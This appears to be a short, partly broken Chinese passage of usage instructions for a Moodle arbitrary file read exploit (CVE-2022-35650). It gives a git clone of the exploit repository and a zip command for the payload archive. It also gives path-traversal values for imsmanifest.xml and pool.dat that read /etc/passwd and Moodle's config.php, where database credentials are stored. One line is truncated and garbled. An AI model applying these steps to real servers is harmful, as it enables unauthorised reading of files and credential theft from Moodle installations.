这是一个在 Moodle 中的任意文件读取漏洞。
你必须已攻破教师或管理员级别的用户账户。
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd)。/etc/passwd 的内容。如果你想读取配置文件(包含敏感凭据),请将 imsmanifest.xml 中的 baseurl 设置为:
../../../../../../../../../../../var/www/html
并将 pool.dat 中的 img src 设置为:
muc/config.php